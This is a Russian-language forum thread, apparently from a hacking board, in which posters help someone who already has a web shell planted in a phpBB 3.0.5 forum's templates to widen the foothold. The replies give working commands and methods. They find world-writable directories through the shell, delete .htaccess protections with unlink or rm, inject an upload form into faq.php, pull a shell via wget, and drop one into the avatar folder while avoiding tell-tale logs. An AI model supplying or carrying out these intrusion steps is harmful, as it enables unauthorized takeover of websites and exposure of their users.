Кто может расписать как залить шелл на форум phpBB версии 3,0,5. директория chache и store под .httaccses
Шелл есть в темплейтах system($_REQUEST[c]) просто я не знаю куда еще шелл залить. ПС доступ к админке пока тоже есть
сделай такой запрос - покажет все возможные папки на запись: &c=system('cd ../; find . -perm -2 -type d -ls'); тьфу, у тебя там уже систем, тогда так: ?c=cd%20../;%20find%20.%20-perm%20-2%20-type%20d%20-ls
т.е. во всех папках с правами на запись есть .htaccess, запрещающий выполнение php-кода? хз, можно попробовать отредактировать файлы в корне форума, откуда уж php точно выполняется. Если прав хватит. Просто вставить форму загрузки например в faq.php посредством определенного php-кода через твой шелл в темплейте. Опять же если правов хватает
а можно подробней, как же отредактировать тот же faq.php через шелл? Если такое возможно то может просто через запрос удалить аксес, а дальше по средствам wget'а заливать шелл
ну дык и удаляй .htaccess, чо ты думаешь unlink('/абсолютный_путь_до_папки/.htaccess'); - через php rm /абсолютный_путь_до_папки/.htaccess - через system опять же если хватит прав
непрактило, может еще есть способы залить в эту сраку шелл? И проверьте правильно ли я вообще запрос wget'a кидаю
причем здесь кеш вообще? А что, папку с авами отменили? Зайди на любую тему в форуме и посмотри свойства авы любого участника - туда и лей, и никаких вгетов, для начала хоть phpinfo.php туда запиши. А то шелл не залил еще, а свой сайт с шеллом уже в логах оставил